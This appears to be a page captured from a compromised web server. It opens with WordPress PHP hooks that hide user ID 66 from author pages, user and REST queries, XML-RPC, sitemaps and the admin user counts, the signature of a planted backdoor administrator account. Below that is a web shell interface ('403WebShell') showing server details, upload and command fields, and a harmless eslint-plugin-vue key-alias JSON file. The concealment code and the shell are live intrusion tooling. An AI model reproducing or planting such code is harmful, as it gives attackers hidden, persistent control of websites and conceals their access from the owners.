add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/eslint-plugin-vue/lib/utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/jungly/node_modules/eslint-plugin-vue/lib/utils/key-aliases.json
[
  "unidentified", "alt", "alt-graph", "caps-lock", "control", "fn", "fn-lock",
  "meta", "num-lock", "scroll-lock", "shift", "symbol", "symbol-lock", "hyper",
  "super", "enter", "tab", "arrow-down", "arrow-left", "arrow-right",
  "arrow-up", "end", "home", "page-down", "page-up", "backspace", "clear",
  "copy", "cr-sel", "cut", "delete", "erase-eof", "ex-sel", "insert", "paste",
  "redo", "undo", "accept", "again", "attn", "cancel", "context-menu", "escape",
  "execute", "find", "help", "pause", "select", "zoom-in", "zoom-out",
  "brightness-down", "brightness-up", "eject", "log-off", "power",
  "print-screen", "hibernate", "standby", "wake-up", "all-candidates",
  "alphanumeric", "code-input", "compose", "convert", "dead", "final-mode",
  "group-first", "group-last", "group-next", "group-previous", "mode-change",
  "next-candidate", "non-convert", "previous-candidate", "process",
  "single-candidate", "hangul-mode", "hanja-mode", "junja-mode", "eisu",
  "hankaku", "hiragana", "hiragana-katakana", "kana-mode", "kanji-mode",
  "katakana", "romaji", "zenkaku", "zenkaku-hankaku", "f1", "f2", "f3", "f4",
  "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12", "soft1", "soft2", "soft3",
  "soft4", "channel-down", "channel-up", "close", "mail-forward", "mail-reply",
  "mail-send", "media-close", "media-fast-forward", "media-pause",
  "media-play-pause", "media-record", "media-rewind", "media-stop",
  "media-track-next", "media-track-previous", "new", "open", "print", "save",
  "spell-check", "key11", "key12", "audio-balance-left", "audio-balance-right",
  "audio-bass-boost-down", "audio-bass-boost-toggle", "audio-bass-boost-up",
  "audio-fader-front", "audio-fader-rear", "audio-surround-mode-next",
  "audio-treble-down", "audio-treble-up", "audio-volume-down",
  "audio-volume-up", "audio-volume-mute", "microphone-toggle",
  "microphone-volume-down", "microphone-volume-up", "microphone-volume-mute",
  "speech-correction-list", "speech-input-toggle", "launch-application1",
  "launch-application2", "launch-calendar", "launch-contacts", "launch-mail",
  "launch-media-player", "launch-music-player", "launch-phone",
  "launch-screen-saver", "launch-spreadsheet", "launch-web-browser",
  "launch-web-cam", "launch-word-processor", "browser-back",
  "browser-favorites", "browser-forward", "browser-home", "browser-refresh",
  "browser-search", "browser-stop", "app-switch", "call", "camera",
  "camera-focus", "end-call", "go-back", "go-home", "headset-hook",
  "last-number-redial", "notification", "manner-mode", "voice-dial", "t-v",
  "t-v3-d-mode", "t-v-antenna-cable", "t-v-audio-description",
  "t-v-audio-description-mix-down", "t-v-audio-description-mix-up",
  "t-v-contents-menu", "t-v-data-service", "t-v-input", "t-v-input-component1",
  "t-v-input-component2", "t-v-input-composite1", "t-v-input-composite2",
  "t-v-input-h-d-m-i1", "t-v-input-h-d-m-i2", "t-v-input-h-d-m-i3",
  "t-v-input-h-d-m-i4", "t-v-input-v-g-a1", "t-v-media-context", "t-v-network",
  "t-v-number-entry", "t-v-power", "t-v-radio-service", "t-v-satellite",
  "t-v-satellite-b-s", "t-v-satellite-c-s", "t-v-satellite-toggle",
  "t-v-terrestrial-analog", "t-v-terrestrial-digital", "t-v-timer",
  "a-v-r-input", "a-v-r-power", "color-f0-red", "color-f1-green",
  "color-f2-yellow", "color-f3-blue", "color-f4-grey", "color-f5-brown",
  "closed-caption-toggle", "dimmer", "display-swap", "d-v-r", "exit",
  "favorite-clear0", "favorite-clear1", "favorite-clear2", "favorite-clear3",
  "favorite-recall0", "favorite-recall1", "favorite-recall2",
  "favorite-recall3", "favorite-store0", "favorite-store1", "favorite-store2",
  "favorite-store3", "guide", "guide-next-day", "guide-previous-day", "info",
  "instant-replay", "link", "list-program", "live-content", "lock",
  "media-apps", "media-last", "media-skip-backward", "media-skip-forward",
  "media-step-backward", "media-step-forward", "media-top-menu", "navigate-in",
  "navigate-next", "navigate-out", "navigate-previous", "next-favorite-channel",
  "next-user-profile", "on-demand", "pairing", "pin-p-down", "pin-p-move",
  "pin-p-toggle", "pin-p-up", "play-speed-down", "play-speed-reset",
  "play-speed-up", "random-toggle", "rc-low-battery", "record-speed-next",
  "rf-bypass", "scan-channels-toggle", "screen-mode-next", "settings",
  "split-screen-toggle", "s-t-b-input", "s-t-b-power", "subtitle", "teletext",
  "video-mode-next", "wink", "zoom-toggle", "audio-volume-down",
  "audio-volume-up", "audio-volume-mute", "browser-back", "browser-forward",
  "channel-down", "channel-up", "context-menu", "eject", "end", "enter", "home",
  "media-fast-forward", "media-play", "media-play-pause", "media-record",
  "media-rewind", "media-stop", "media-next-track", "media-pause",
  "media-previous-track", "power", "unidentified"
]

Youez - 2016 - github.com/yon3zu
LinuXploit